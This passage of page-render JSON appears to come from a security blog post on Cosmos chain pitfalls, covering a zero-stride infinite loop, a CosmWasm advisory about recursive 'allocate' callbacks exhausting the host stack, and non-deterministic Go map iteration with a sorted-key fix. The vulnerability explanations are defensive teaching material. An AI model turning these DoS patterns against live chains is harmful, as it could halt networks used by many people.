sum",{"type":27,"tag":207,"props":83797,"children":83798},{"style":226},[83799],{"type":33,"value":22339},{"type":27,"tag":207,"props":83801,"children":83802},{"style":220},[83803],{"type":33,"value":83731},{"type":27,"tag":207,"props":83805,"children":83806},{"style":238},[83807],{"type":33,"value":1041},{"type":27,"tag":207,"props":83809,"children":83810},{"style":220},[83811],{"type":33,"value":83706},{"type":27,"tag":207,"props":83813,"children":83814},{"style":238},[83815],{"type":33,"value":11019},{"type":27,"tag":207,"props":83817,"children":83818},{"style":220},[83819],{"type":33,"value":83749},{"type":27,"tag":207,"props":83821,"children":83822},{"style":238},[83823],{"type":33,"value":19050},{"type":27,"tag":207,"props":83825,"children":83826},{"class":209,"line":4304},[83827],{"type":27,"tag":207,"props":83828,"children":83829},{"style":238},[83830],{"type":33,"value":10645},{"type":27,"tag":207,"props":83832,"children":83833},{"class":209,"line":5466},[83834,83838,83842,83846,83850,83855,83859,83864,83869],{"type":27,"tag":207,"props":83835,"children":83836},{"style":376},[83837],{"type":33,"value":8986},{"type":27,"tag":207,"props":83839,"children":83840},{"style":226},[83841],{"type":33,"value":14423},{"type":27,"tag":207,"props":83843,"children":83844},{"style":8920},[83845],{"type":33,"value":83623},{"type":27,"tag":207,"props":83847,"children":83848},{"style":238},[83849],{"type":33,"value":1322},{"type":27,"tag":207,"props":83851,"children":83852},{"style":220},[83853],{"type":33,"value":83854},"Sum",{"type":27,"tag":207,"props":83856,"children":83857},{"style":238},[83858],{"type":33,"value":22606},{"type":27,"tag":207,"props":83860,"children":83861},{"style":220},[83862],{"type":33,"value":83863},"sum",{"type":27,"tag":207,"props":83865,"children":83866},{"style":238},[83867],{"type":33,"value":83868},"}, ",{"type":27,"tag":207,"props":83870,"children":83871},{"style":214},[83872],{"type":33,"value":83873},"nil\n",{"type":27,"tag":207,"props":83875,"children":83876},{"class":209,"line":5530},[83877],{"type":27,"tag":207,"props":83878,"children":83879},{"style":238},[83880],{"type":33,"value":451},{"type":27,"tag":36,"props":83882,"children":83883},{},[83884,83886,83891,83892,83898],{"type":33,"value":83885},"The provided Solidity / Cosmos snippets feature a public function that calculates the sums of an array using a provided starting ",{"type":27,"tag":84,"props":83887,"children":83889},{"className":83888},[],[83890],{"type":33,"value":83749},{"type":33,"value":14596},{"type":27,"tag":84,"props":83893,"children":83895},{"className":83894},[],[83896],{"type":33,"value":83897},"stride",{"type":33,"value":83899},". It is crucial to note that this function lacks robustness. A keen observer might have already identified that if the user supplies a stride value of 0, the code will result in an infinite loop.",{"type":27,"tag":36,"props":83901,"children":83902},{},[83903],{"type":33,"value":83904},"While an infinite loop is not ideal for Solidity, it may still be tolerable. The underlying blockchain on which a smart contract operates is responsible for monitoring the gas and computation budget. It will intervene and terminate the execution at a certain point. Interestingly, those types of \"unhandled error\" patterns are quite common occurrences in contracts.",{"type":27,"tag":36,"props":83906,"children":83907},{},[83908],{"type":33,"value":83909},"However, the same logic does not directly apply to Cosmos. In Cosmos, users are responsible for implementing the entire L1, and there is no underlying computation budget tracker that automatically stops code execution. As a result, any potential logic DoS or infinite loop can directly lead to the custom Cosmos L1 chain halting or stalling.",{"type":27,"tag":36,"props":83911,"children":83912},{},[83913],{"type":33,"value":83914},"This toy scenario captures the importance of attention to error handling, edge cases, and overall robustness in Cosmos.",{"type":27,"tag":58,"props":83916,"children":83918},{"id":83917},"real-world-examples",[83919],{"type":33,"value":83920},"Real-World Examples",{"type":27,"tag":36,"props":83922,"children":83923},{},[83924],{"type":33,"value":83925},"Now, let's examine a few real-world instances.",{"type":27,"tag":36,"props":83927,"children":83928},{},[83929,83931,83937,83938,83944,83946,83952,83954,83960],{"type":33,"value":83930},"In the case of ",{"type":27,"tag":47,"props":83932,"children":83935},{"href":83933,"rel":83934},"https://github.com/JumpCrypto/security-research/blob/e900a400f763075bdae161f4fd6e36d70da1d844/advisories/2023-003-cosmwasm.md",[51],[83936],{"type":33,"value":24964},{"type":33,"value":13740},{"type":27,"tag":84,"props":83939,"children":83941},{"className":83940},[],[83942],{"type":33,"value":83943},"CosmWasm",{"type":33,"value":83945}," bug, the helper method ",{"type":27,"tag":84,"props":83947,"children":83949},{"className":83948},[],[83950],{"type":33,"value":83951},"write_to_contract",{"type":33,"value":83953}," negligently calls the untrusted Wasm function ",{"type":27,"tag":84,"props":83955,"children":83957},{"className":83956},[],[83958],{"type":33,"value":83959},"\"allocate\"",{"type":33,"value":1041},{"type":27,"tag":36,"props":83962,"children":83963},{},[83964],{"type":27,"tag":47,"props":83965,"children":83968},{"href":83966,"rel":83967},"https://github.com/CosmWasm/cosmwasm/blob/db426f9b15eabf18359df62878847bbaa7cb85ef/packages/vm/src/imports.rs#L409",[51],[83969],{"type":33,"value":83970},"Permalink for snippet",{"type":27,"tag":101,"props":83972,"children":83974},{"code":83973,"language":10269,"meta":7,"className":10270,"style":7},"fn write_to_contract\u003CA: BackendApi, S: Storage, Q: Querier>(\n env: &Environment\u003CA, S, Q>,\n input: &[u8],\n) -> VmResult\u003Cu32> {\n let out_size = to_u32(input.len())?;\n let result = env.call_function1(\"allocate\", &[out_size.into()])?;\n let target_ptr = ref_to_u32(&result)?;\n if target_ptr == 0 {\n return Err(CommunicationError::zero_address().into());\n }\n write_region(&env.memory(), target_ptr, input)?;\n Ok(target_ptr)\n}\n",[83975],{"type":27,"tag":84,"props":83976,"children":83977},{"__ignoreMap":7},[83978,84047,84095,84123,84152,84201,84275,84320,84343,84388,84395,84452,84471],{"type":27,"tag":207,"props":83979,"children":83980},{"class":209,"line":210},[83981,83985,83990,83994,83999,84003,84008,84012,84016,84020,84025,84029,84034,84038,84043],{"type":27,"tag":207,"props":83982,"children":83983},{"style":214},[83984],{"type":33,"value":27538},{"type":27,"tag":207,"props":83986,"children":83987},{"style":1335},[83988],{"type":33,"value":83989}," write_to_contract",{"type":27,"tag":207,"props":83991,"children":83992},{"style":238},[83993],{"type":33,"value":9257},{"type":27,"tag":207,"props":83995,"children":83996},{"style":8920},[83997],{"type":33,"value":83998},"A",{"type":27,"tag":207,"props":84000,"children":84001},{"style":226},[84002],{"type":33,"value":736},{"type":27,"tag":207,"props":84004,"children":84005},{"style":8920},[84006],{"type":33,"value":84007}," BackendApi",{"type":27,"tag":207,"props":84009,"children":84010},{"style":238},[84011],{"type":33,"value":1123},{"type":27,"tag":207,"props":84013,"children":84014},{"style":8920},[84015],{"type":33,"value":29322},{"type":27,"tag":207,"props":84017,"children":84018},{"style":226},[84019],{"type":33,"value":736},{"type":27,"tag":207,"props":84021,"children":84022},{"style":8920},[84023],{"type":33,"value":84024}," Storage",{"type":27,"tag":207,"props":84026,"children":84027},{"style":238},[84028],{"type":33,"value":1123},{"type":27,"tag":207,"props":84030,"children":84031},{"style":8920},[84032],{"type":33,"value":84033},"Q",{"type":27,"tag":207,"props":84035,"children":84036},{"style":226},[84037],{"type":33,"value":736},{"type":27,"tag":207,"props":84039,"children":84040},{"style":8920},[84041],{"type":33,"value":84042}," Querier",{"type":27,"tag":207,"props":84044,"children":84045},{"style":238},[84046],{"type":33,"value":13870},{"type":27,"tag":207,"props":84048,"children":84049},{"class":209,"line":244},[84050,84054,84058,84062,84067,84071,84075,84079,84083,84087,84091],{"type":27,"tag":207,"props":84051,"children":84052},{"style":220},[84053],{"type":33,"value":11124},{"type":27,"tag":207,"props":84055,"children":84056},{"style":226},[84057],{"type":33,"value":736},{"type":27,"tag":207,"props":84059,"children":84060},{"style":226},[84061],{"type":33,"value":14423},{"type":27,"tag":207,"props":84063,"children":84064},{"style":8920},[84065],{"type":33,"value":84066},"Environment",{"type":27,"tag":207,"props":84068,"children":84069},{"style":238},[84070],{"type":33,"value":9257},{"type":27,"tag":207,"props":84072,"children":84073},{"style":8920},[84074],{"type":33,"value":83998},{"type":27,"tag":207,"props":84076,"children":84077},{"style":238},[84078],{"type":33,"value":1123},{"type":27,"tag":207,"props":84080,"children":84081},{"style":8920},[84082],{"type":33,"value":29322},{"type":27,"tag":207,"props":84084,"children":84085},{"style":238},[84086],{"type":33,"value":1123},{"type":27,"tag":207,"props":84088,"children":84089},{"style":8920},[84090],{"type":33,"value":84033},{"type":27,"tag":207,"props":84092,"children":84093},{"style":238},[84094],{"type":33,"value":13420},{"type":27,"tag":207,"props":84096,"children":84097},{"class":209,"line":270},[84098,84103,84107,84111,84115,84119],{"type":27,"tag":207,"props":84099,"children":84100},{"style":220},[84101],{"type":33,"value":84102}," input",{"type":27,"tag":207,"props":84104,"children":84105},{"style":226},[84106],{"type":33,"value":736},{"type":27,"tag":207,"props":84108,"children":84109},{"style":226},[84110],{"type":33,"value":14423},{"type":27,"tag":207,"props":84112,"children":84113},{"style":238},[84114],{"type":33,"value":11019},{"type":27,"tag":207,"props":84116,"children":84117},{"style":8920},[84118],{"type":33,"value":10709},{"type":27,"tag":207,"props":84120,"children":84121},{"style":238},[84122],{"type":33,"value":21539},{"type":27,"tag":207,"props":84124,"children":84125},{"class":209,"line":296},[84126,84130,84134,84139,84143,84148],{"type":27,"tag":207,"props":84127,"children":84128},{"style":238},[84129],{"type":33,"value":2222},{"type":27,"tag":207,"props":84131,"children":84132},{"style":226},[84133],{"type":33,"value":8968},{"type":27,"tag":207,"props":84135,"children":84136},{"style":8920},[84137],{"type":33,"value":84138}," VmResult",{"type":27,"tag":207,"props":84140,"children":84141},{"style":238},[84142],{"type":33,"value":9257},{"type":27,"tag":207,"props":84144,"children":84145},{"style":8920},[84146],{"type":33,"value":84147},"u32",{"type":27,"tag":207,"props":84149,"children":84150},{"style":238},[84151],{"type":33,"value":14563},{"type":27,"tag":207,"props":84153,"children":84154},{"class":209,"line":445},[84155,84159,84164,84168,84173,84177,84181,84185,84189,84193,84197],{"type":27,"tag":207,"props":84156,"children":84157},{"style":214},[84158],{"type":33,"value":10290},{"type":27,"tag":207,"props":84160,"children":84161},{"style":220},[84162],{"type":33,"value":84163}," out_size",{"type":27,"tag":207,"props":84165,"children":84166},{"style":226},[84167],{"type":33,"value":229},{"type":27,"tag":207,"props":84169,"children":84170},{"style":1335},[84171],{"type":33,"value":84172}," to_u32",{"type":27,"tag":207,"props":84174,"children":84175},{"style":238},[84176],{"type":33,"value":1343},{"type":27,"tag":207,"props":84178,"children":84179},{"style":220},[84180],{"type":33,"value":15648},{"type":27,"tag":207,"props":84182,"children":84183},{"style":226},[84184],{"type":33,"value":1041},{"type":27,"tag":207,"props":84186,"children":84187},{"style":1335},[84188],{"type":33,"value":16416},{"type":27,"tag":207,"props":84190,"children":84191},{"style":238},[84192],{"type":33,"value":49209},{"type":27,"tag":207,"props":84194,"children":84195},{"style":226},[84196],{"type":33,"value":10444},{"type":27,"tag":207,"props":84198,"children":84199},{"style":238},[84200],{"type":33,"value":241},{"type":27,"tag":207,"props":84202,"children":84203},{"class":209,"line":867},[84204,84208,84212,84216,84220,84224,84229,84233,84237,84241,84245,84249,84254,84258,84262,84267,84271],{"type":27,"tag":207,"props":84205,"children":84206},{"style":214},[84207],{"type":33,"value":10290},{"type":27,"tag":207,"props":84209,"children":84210},{"style":220},[84211],{"type":33,"value":2140},{"type":27,"tag":207,"props":84213,"children":84214},{"style":226},[84215],{"type":33,"value":229},{"type":27,"tag":207,"props":84217,"children":84218},{"style":220},[84219],{"type":33,"value":50203},{"type":27,"tag":207,"props":84221,"children":84222},{"style":226},[84223],{"type":33,"value":1041},{"type":27,"tag":207,"props":84225,"children":84226},{"style":1335},[84227],{"type":33,"value":84228},"call_function1",{"type":27,"tag":207,"props":84230,"children":84231},{"style":238},[84232],{"type":33,"value":1343},{"type":27,"tag":207,"props":84234,"children":84235},{"style":1325},[84236],{"type":33,"value":83959},{"type":27,"tag":207,"props":84238,"children":84239},{"style":238},[84240],{"type":33,"value":1123},{"type":27,"tag":207,"props":84242,"children":84243},{"style":226},[84244],{"type":33,"value":10398},{"type":27,"tag":207,"props":84246,"children":84247},{"style":238},[84248],{"type":33,"value":11019},{"type":27,"tag":207,"props":84250,"children":84251},{"style":220},[84252],{"type":33,"value":84253},"out_size",{"type":27,"tag":207,"props":84255,"children":84256},{"style":226},[84257],{"type":33,"value":1041},{"type":27,"tag":207,"props":84259,"children":84260},{"style":1335},[84261],{"type":33,"value":22160},{"type":27,"tag":207,"props":84263,"children":84264},{"style":238},[84265],{"type":33,"value":84266},"()])",{"type":27,"tag":207,"props":84268,"children":84269},{"style":226},[84270],{"type":33,"value":10444},{"type":27,"tag":207,"props":84272,"children":84273},{"style":238},[84274],{"type":33,"value":241},{"type":27,"tag":207,"props":84276,"children":84277},{"class":209,"line":892},[84278,84282,84287,84291,84296,84300,84304,84308,84312,84316],{"type":27,"tag":207,"props":84279,"children":84280},{"style":214},[84281],{"type":33,"value":10290},{"type":27,"tag":207,"props":84283,"children":84284},{"style":220},[84285],{"type":33,"value":84286}," target_ptr",{"type":27,"tag":207,"props":84288,"children":84289},{"style":226},[84290],{"type":33,"value":229},{"type":27,"tag":207,"props":84292,"children":84293},{"style":1335},[84294],{"type":33,"value":84295}," ref_to_u32",{"type":27,"tag":207,"props":84297,"children":84298},{"style":238},[84299],{"type":33,"value":1343},{"type":27,"tag":207,"props":84301,"children":84302},{"style":226},[84303],{"type":33,"value":10398},{"type":27,"tag":207,"props":84305,"children":84306},{"style":220},[84307],{"type":33,"value":4242},{"type":27,"tag":207,"props":84309,"children":84310},{"style":238},[84311],{"type":33,"value":10416},{"type":27,"tag":207,"props":84313,"children":84314},{"style":226},[84315],{"type":33,"value":10444},{"type":27,"tag":207,"props":84317,"children":84318},{"style":238},[84319],{"type":33,"value":241},{"type":27,"tag":207,"props":84321,"children":84322},{"class":209,"line":1475},[84323,84327,84331,84335,84339],{"type":27,"tag":207,"props":84324,"children":84325},{"style":376},[84326],{"type":33,"value":19556},{"type":27,"tag":207,"props":84328,"children":84329},{"style":220},[84330],{"type":33,"value":84286},{"type":27,"tag":207,"props":84332,"children":84333},{"style":226},[84334],{"type":33,"value":10572},{"type":27,"tag":207,"props":84336,"children":84337},{"style":232},[84338],{"type":33,"value":4680},{"type":27,"tag":207,"props":84340,"children":84341},{"style":238},[84342],{"type":33,"value":384},{"type":27,"tag":207,"props":84344,"children":84345},{"class":209,"line":2065},[84346,84350,84354,84358,84363,84367,84372,84376,84380,84384],{"type":27,"tag":207,"props":84347,"children":84348},{"style":376},[84349],{"type":33,"value":23019},{"type":27,"tag":207,"props":84351,"children":84352},{"style":8920},[84353],{"type":33,"value":23024},{"type":27,"tag":207,"props":84355,"children":84356},{"style":238},[84357],{"type":33,"value":1343},{"type":27,"tag":207,"props":84359,"children":84360},{"style":8920},[84361],{"type":33,"value":84362},"CommunicationError",{"type":27,"tag":207,"props":84364,"children":84365},{"style":226},[84366],{"type":33,"value":10768},{"type":27,"tag":207,"props":84368,"children":84369},{"style":1335},[84370],{"type":33,"value":84371},"zero_address",{"type":27,"tag":207,"props":84373,"children":84374},{"style":238},[84375],{"type":33,"value":21155},{"type":27,"tag":207,"props":84377,"children":84378},{"style":226},[84379],{"type":33,"value":1041},{"type":27,"tag":207,"props":84381,"children":84382},{"style":1335},[84383],{"type":33,"value":22160},{"type":27,"tag":207,"props":84385,"children":84386},{"style":238},[84387],{"type":33,"value":22700},{"type":27,"tag":207,"props":84389,"children":84390},{"class":209,"line":2092},[84391],{"type":27,"tag":207,"props":84392,"children":84393},{"style":238},[84394],{"type":33,"value":10645},{"type":27,"tag":207,"props":84396,"children":84397},{"class":209,"line":2130},[84398,84403,84407,84411,84415,84419,84423,84427,84432,84436,84440,84444,84448],{"type":27,"tag":207,"props":84399,"children":84400},{"style":1335},[84401],{"type":33,"value":84402}," write_region",{"type":27,"tag":207,"props":84404,"children":84405},{"style":238},[84406],{"type":33,"value":1343},{"type":27,"tag":207,"props":84408,"children":84409},{"style":226},[84410],{"type":33,"value":10398},{"type":27,"tag":207,"props":84412,"children":84413},{"style":220},[84414],{"type":33,"value":42942},{"type":27,"tag":207,"props":84416,"children":84417},{"style":226},[84418],{"type":33,"value":1041},{"type":27,"tag":207,"props":84420,"children":84421},{"style":1335},[84422],{"type":33,"value":83205},{"type":27,"tag":207,"props":84424,"children":84425},{"style":238},[84426],{"type":33,"value":25646},{"type":27,"tag":207,"props":84428,"children":84429},{"style":220},[84430],{"type":33,"value":84431},"target_ptr",{"type":27,"tag":207,"props":84433,"children":84434},{"style":238},[84435],{"type":33,"value":1123},{"type":27,"tag":207,"props":84437,"children":84438},{"style":220},[84439],{"type":33,"value":15648},{"type":27,"tag":207,"props":84441,"children":84442},{"style":238},[84443],{"type":33,"value":10416},{"type":27,"tag":207,"props":84445,"children":84446},{"style":226},[84447],{"type":33,"value":10444},{"type":27,"tag":207,"props":84449,"children":84450},{"style":238},[84451],{"type":33,"value":241},{"type":27,"tag":207,"props":84453,"children":84454},{"class":209,"line":2168},[84455,84459,84463,84467],{"type":27,"tag":207,"props":84456,"children":84457},{"style":8920},[84458],{"type":33,"value":21609},{"type":27,"tag":207,"props":84460,"children":84461},{"style":238},[84462],{"type":33,"value":1343},{"type":27,"tag":207,"props":84464,"children":84465},{"style":220},[84466],{"type":33,"value":84431},{"type":27,"tag":207,"props":84468,"children":84469},{"style":238},[84470],{"type":33,"value":10449},{"type":27,"tag":207,"props":84472,"children":84473},{"class":209,"line":4095},[84474],{"type":27,"tag":207,"props":84475,"children":84476},{"style":238},[84477],{"type":33,"value":451},{"type":27,"tag":36,"props":84479,"children":84480},{},[84481,84483,84489,84491,84496],{"type":33,"value":84482},"As users have complete control over ",{"type":27,"tag":84,"props":84484,"children":84486},{"className":84485},[],[84487],{"type":33,"value":84488},"allocate",{"type":33,"value":84490},", there is a possibility to call back ",{"type":27,"tag":84,"props":84492,"children":84494},{"className":84493},[],[84495],{"type":33,"value":83951},{"type":33,"value":84497}," repeatedly through other imported functions. This can result in the depletion of the host stack and ultimately lead to a DoS.",{"type":27,"tag":36,"props":84499,"children":84500},{},[84501,84503,84510],{"type":33,"value":84502},"Additional real-world examples include ",{"type":27,"tag":47,"props":84504,"children":84507},{"href":84505,"rel":84506},"https://github.com/cosmos/cosmos-sdk/issues/16676",[51],[84508],{"type":33,"value":84509},"not returning proper values for malformed txs",{"type":33,"value":1041},{"type":27,"tag":28,"props":84512,"children":84514},{"id":84513},"order-was-the-dream-of-man",[84515],{"type":33,"value":84516},"Order Was the Dream of Man",{"type":27,"tag":36,"props":84518,"children":84519},{},[84520],{"type":33,"value":84521},"Different from solidity, which is a domain-specific language for smart contracts, Golang is not. Therefore, developers must be mindful of specific footguns. One notable instance is non-determinism.",{"type":27,"tag":36,"props":84523,"children":84524},{},[84525],{"type":33,"value":84526},"Consider a scenario where there is a requirement to emit an event for every entry in a map. It might be tempting to implement this as demonstrated below:",{"type":27,"tag":101,"props":84528,"children":84530},{"code":84529,"language":83397,"meta":7,"className":83398,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n for key, value := range objectMap {\n ctx.EventManager.EmitEvent(\n sdk.NewEvent(\n \"MapContext\",\n sdk.NewAttribute(key, value),\n )\n )\n }\n}\n",[84531],{"type":27,"tag":84,"props":84532,"children":84533},{"__ignoreMap":7},[84534,84567,84574,84603,84640,84669,84690,84702,84739,84747,84754,84761],{"type":27,"tag":207,"props":84535,"children":84536},{"class":209,"line":210},[84537,84541,84546,84550,84554,84558,84562],{"type":27,"tag":207,"props":84538,"children":84539},{"style":214},[84540],{"type":33,"value":40014},{"type":27,"tag":207,"props":84542,"children":84543},{"style":8920},[84544],{"type":33,"value":84545}," ObjectMap",{"type":27,"tag":207,"props":84547,"children":84548},{"style":214},[84549],{"type":33,"value":56907},{"type":27,"tag":207,"props":84551,"children":84552},{"style":238},[84553],{"type":33,"value":11019},{"type":27,"tag":207,"props":84555,"children":84556},{"style":8920},[84557],{"type":33,"value":36928},{"type":27,"tag":207,"props":84559,"children":84560},{"style":238},[84561],{"type":33,"value":22686},{"type":27,"tag":207,"props":84563,"children":84564},{"style":8920},[84565],{"type":33,"value":84566},"string\n",{"type":27,"tag":207,"props":84568,"children":84569},{"class":209,"line":244},[84570],{"type":27,"tag":207,"props":84571,"children":84572},{"emptyLinePlaceholder":19},[84573],{"type":33,"value":2062},{"type":27,"tag":207,"props":84575,"children":84576},{"class":209,"line":270},[84577,84581,84586,84590,84595,84599],{"type":27,"tag":207,"props":84578,"children":84579},{"style":214},[84580],{"type":33,"value":2085},{"type":27,"tag":207,"props":84582,"children":84583},{"style":1335},[84584],{"type":33,"value":84585}," EmitEntries",{"type":27,"tag":207,"props":84587,"children":84588},{"style":238},[84589],{"type":33,"value":1343},{"type":27,"tag":207,"props":84591,"children":84592},{"style":220},[84593],{"type":33,"value":84594},"objectMap",{"type":27,"tag":207,"props":84596,"children":84597},{"style":8920},[84598],{"type":33,"value":84545},{"type":27,"tag":207,"props":84600,"children":84601},{"style":238},[84602],{"type":33,"value":1424},{"type":27,"tag":207,"props":84604,"children":84605},{"class":209,"line":296},[84606,84610,84614,84618,84622,84626,84631,84636],{"type":27,"tag":207,"props":84607,"children":84608},{"style":376},[84609],{"type":33,"value":10321},{"type":27,"tag":207,"props":84611,"children":84612},{"style":220},[84613],{"type":33,"value":13213},{"type":27,"tag":207,"props":84615,"children":84616},{"style":238},[84617],{"type":33,"value":1123},{"type":27,"tag":207,"props":84619,"children":84620},{"style":220},[84621],{"type":33,"value":4196},{"type":27,"tag":207,"props":84623,"children":84624},{"style":226},[84625],{"type":33,"value":83648},{"type":27,"tag":207,"props":84627,"children":84628},{"style":376},[84629],{"type":33,"value":84630}," range",{"type":27,"tag":207,"props":84632,"children":84633},{"style":220},[84634],{"type":33,"value":84635}," objectMap",{"type":27,"tag":207,"props":84637,"children":84638},{"style":238},[84639],{"type":33,"value":384},{"type":27,"tag":207,"props":84641,"children":84642},{"class":209,"line":445},[84643,84647,84651,84656,84660,84665],{"type":27,"tag":207,"props":84644,"children":84645},{"style":220},[84646],{"type":33,"value":33451},{"type":27,"tag":207,"props":84648,"children":84649},{"style":238},[84650],{"type":33,"value":1041},{"type":27,"tag":207,"props":84652,"children":84653},{"style":220},[84654],{"type":33,"value":84655},"EventManager",{"type":27,"tag":207,"props":84657,"children":84658},{"style":238},[84659],{"type":33,"value":1041},{"type":27,"tag":207,"props":84661,"children":84662},{"style":1335},[84663],{"type":33,"value":84664},"EmitEvent",{"type":27,"tag":207,"props":84666,"children":84667},{"style":238},[84668],{"type":33,"value":9090},{"type":27,"tag":207,"props":84670,"children":84671},{"class":209,"line":867},[84672,84677,84681,84686],{"type":27,"tag":207,"props":84673,"children":84674},{"style":220},[84675],{"type":33,"value":84676}," sdk",{"type":27,"tag":207,"props":84678,"children":84679},{"style":238},[84680],{"type":33,"value":1041},{"type":27,"tag":207,"props":84682,"children":84683},{"style":1335},[84684],{"type":33,"value":84685},"NewEvent",{"type":27,"tag":207,"props":84687,"children":84688},{"style":238},[84689],{"type":33,"value":9090},{"type":27,"tag":207,"props":84691,"children":84692},{"class":209,"line":892},[84693,84698],{"type":27,"tag":207,"props":84694,"children":84695},{"style":1325},[84696],{"type":33,"value":84697}," \"MapContext\"",{"type":27,"tag":207,"props":84699,"children":84700},{"style":238},[84701],{"type":33,"value":1842},{"type":27,"tag":207,"props":84703,"children":84704},{"class":209,"line":1475},[84705,84710,84714,84719,84723,84727,84731,84735],{"type":27,"tag":207,"props":84706,"children":84707},{"style":220},[84708],{"type":33,"value":84709}," sdk",{"type":27,"tag":207,"props":84711,"children":84712},{"style":238},[84713],{"type":33,"value":1041},{"type":27,"tag":207,"props":84715,"children":84716},{"style":1335},[84717],{"type":33,"value":84718},"NewAttribute",{"type":27,"tag":207,"props":84720,"children":84721},{"style":238},[84722],{"type":33,"value":1343},{"type":27,"tag":207,"props":84724,"children":84725},{"style":220},[84726],{"type":33,"value":79387},{"type":27,"tag":207,"props":84728,"children":84729},{"style":238},[84730],{"type":33,"value":1123},{"type":27,"tag":207,"props":84732,"children":84733},{"style":220},[84734],{"type":33,"value":4196},{"type":27,"tag":207,"props":84736,"children":84737},{"style":238},[84738],{"type":33,"value":14018},{"type":27,"tag":207,"props":84740,"children":84741},{"class":209,"line":2065},[84742],{"type":27,"tag":207,"props":84743,"children":84744},{"style":238},[84745],{"type":33,"value":84746}," )\n",{"type":27,"tag":207,"props":84748,"children":84749},{"class":209,"line":2092},[84750],{"type":27,"tag":207,"props":84751,"children":84752},{"style":238},[84753],{"type":33,"value":75554},{"type":27,"tag":207,"props":84755,"children":84756},{"class":209,"line":2130},[84757],{"type":27,"tag":207,"props":84758,"children":84759},{"style":238},[84760],{"type":33,"value":10645},{"type":27,"tag":207,"props":84762,"children":84763},{"class":209,"line":2168},[84764],{"type":27,"tag":207,"props":84765,"children":84766},{"style":238},[84767],{"type":33,"value":451},{"type":27,"tag":36,"props":84769,"children":84770},{},[84771],{"type":33,"value":84772},"It's important to note that Golang map iterators are unordered by design. As stated below in the Golang documentation citation, running the same code with different validators may result in varying event orders, potentially causing consensus problems.",{"type":27,"tag":10222,"props":84774,"children":84775},{},[84776],{"type":27,"tag":36,"props":84777,"children":84778},{},[84779],{"type":33,"value":84780},"When iterating over a map with a range loop, the iteration order is not specified and is not guaranteed to be the same from one iteration to the next.",{"type":27,"tag":36,"props":84782,"children":84783},{},[84784,84786,84791],{"type":33,"value":84785},"To correctly implement iteration orders, developers must explicitly sort the keys of the ",{"type":27,"tag":84,"props":84787,"children":84789},{"className":84788},[],[84790],{"type":33,"value":74335},{"type":33,"value":84792}," and then fetch the values using the sorted key array before emitting them.",{"type":27,"tag":101,"props":84794,"children":84796},{"code":84795,"language":83397,"meta":7,"className":83398,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n var keys []string\n for key := range objectMap {\n keys = append(keys, key)\n }\n sort.Strings(keys)\n\n for _, key := range keys {\n ctx.EventManager.EmitEvent(\n sdk.NewEvent(\n \"MapContext\",\n sdk.NewAttribute(key, objectMap[key]),\n )\n )\n }\n}\n",[84797],{"type":27,"tag":84,"props":84798,"children":84799},{"__ignoreMap":7},[84800,84831,84838,84865,84885,84912,84948,84955,84984,84991,85026,85053,85072,85083,85127,85134,85141,85148],{"type":27,"tag":207,"props":84801,"children":84802},{"class":209,"line":210},[84803,84807,84811,84815,84819,84823,84827],{"type":27,"tag":207,"props":84804,"children":84805},{"style":214},[84806],{"type":33,"value":40014},{"type":27,"tag":207,"props":84808,"children":84809},{"style":8920},[84810],{"type":33,"value":84545},{"type":27,"tag":207,"props":84812,"children":84813},{"style":214},[84814],{"type":33,"value":56907},{"type":27,"tag":207,"props":84816,"children":84817},{"style":238},[84818],{"type":33,"value":11019},{"type":27,"tag":207,"props":84820,"children":84821},{"style":8920},[84822],{"type":33,"value":36928},{"type":27,"tag":207,"props":84824,"children":84825},{"style":238},[84826],{"type":33,"value":22686},{"type":27,"tag":207,"props":84828,"children":84829},{"style":8920},[84830],{"type":33,"value":84566},{"type":27,"tag":207,"props":84832,"children":84833},{"class":209,"line":244},[84834],{"type":27,"tag":207,"props":84835,"children":84836},{"emptyLinePlaceholder":19},[84837],{"type":33,"value":2062},{"type":27,"tag":207,"props":84839,"children":84840},{"class":209,"line":270},[84841,84845,84849,84853,84857,84861],{"type":27,"tag":207,"props":84842,"children":84843},{"style":214},[84844],{"type":33,"value":2085},{"type":27,"tag":207,"props":84846,"children":84847},{"style":1335},[84848],{"type":33,"value":84585},{"type":27,"tag":207,"props":84850,"children":84851},{"style":238},[84852],{"type":33,"value":1343},{"type":27,"tag":207,"props":84854,"children":84855},{"style":220},[84856],{"type":33,"value":84594},{"type":27,"tag":207,"props":84858,"children":84859},{"style":8920},[84860],{"type":33,"value":84545},{"type":27,"tag":207,"props":84862,"children":84863},{"style":238},[84864],{"type":33,"value":1424},{"type":27,"tag":207,"props":84866,"children":84867},{"class":209,"line":296},[84868,84873,84877,84881],{"type":27,"tag":207,"props":84869,"children":84870},{"style":214},[84871],{"type":33,"value":84872}," var",{"type":27,"tag":207,"props":84874,"children":84875},{"style":220},[84876],{"type":33,"value":28652},{"type":27,"tag":207,"props":84878,"children":84879},{"style":238},[84880],{"type":33,"value":83460},{"type":27,"tag":207,"props":84882,"children":84883},{"style":8920},[84884],{"type":33,"value":84566},{"type":27,"tag":207,"props":84886,"children":84887},{"class":209,"line":445},[84888,84892,84896,84900,84904,84908],{"type":27,"tag":207,"props":84889,"children":84890},{"style":376},[84891],{"type":33,"value":10321},{"type":27,"tag":207,"props":84893,"children":84894},{"style":220},[84895],{"type":33,"value":13213},{"type":27,"tag":207,"props":84897,"children":84898},{"style":226},[84899],{"type":33,"value":83648},{"type":27,"tag":207,"props":84901,"children":84902},{"style":376},[84903],{"type":33,"value":84630},{"type":27,"tag":207,"props":84905,"children":84906},{"style":220},[84907],{"type":33,"value":84635},{"type":27,"tag":207,"props":84909,"children":84910},{"style":238},[84911],{"type":33,"value":384},{"type":27,"tag":207,"props":84913,"children":84914},{"class":209,"line":867},[84915,84919,84923,84928,84932,84936,84940,84944],{"type":27,"tag":207,"props":84916,"children":84917},{"style":220},[84918],{"type":33,"value":32596},{"type":27,"tag":207,"props":84920,"children":84921},{"style":226},[84922],{"type":33,"value":229},{"type":27,"tag":207,"props":84924,"children":84925},{"style":1335},[84926],{"type":33,"value":84927}," 